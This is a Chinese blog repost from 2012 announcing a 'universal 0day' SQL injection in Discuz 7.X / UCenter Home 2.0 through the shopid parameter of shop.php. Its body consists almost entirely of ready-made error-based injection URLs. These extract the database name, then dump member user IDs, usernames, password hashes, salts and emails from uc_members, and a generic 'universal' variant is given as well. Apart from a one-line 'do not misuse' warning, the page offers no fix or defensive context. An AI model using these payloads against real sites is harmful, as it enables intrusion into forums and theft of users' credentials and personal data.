会飞的鱼

淮阳四通镇电脑组装
电脑维修、直播声卡、监控安装、手机解锁
首页 » 资源分享 » Discuz7.X通杀0day(UCenter Home-2.0)

Discuz7.X通杀0day(UCenter Home-2.0)

原文链接 COG论坛

http://forum.chowngroup.com/forum.php?mod=viewthread&tid=137

 

漏洞文件 : Shop.php  
漏洞表现: ?ac=view&shopid=  
漏洞类型 : SQL Injection (MySQL Error Based)  
利用POC:

1、查询出UC_HOME的DATABSE:

  1. http://xxoo.com/shop.php?ac=view&shopid=1 and (select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  

2、根据1查询出的DATABSE(替换XXOO_UC_DB),进一步注入出member信息。

  1. http://xxoo.com/shop.php?ac=view&shopid=1 and (select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.salt,0x3a,uc_members.email) as char),0x27,0x7e) from `XXOO_UC_DB`.uc_members LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
通用POC:
  1. http://xxoo.com/shop.php?ac=view&shopid=50534 and (select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email) as char),0x27,0x7e) from ucenter.uc_members LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

请勿乱用!!!

文章如无特别注明均为原创! 作者: 孔国军, 转载或复制请以 超链接形式 并注明出处 国军博客
原文地址《 Discuz7.X通杀0day(UCenter Home-2.0)》发布于2012-7-29

分享到:
打赏

评论

游客

看不清楚?点图切换
切换注册

登录

您也可以使用第三方帐号快捷登录

切换登录

注册

sitemap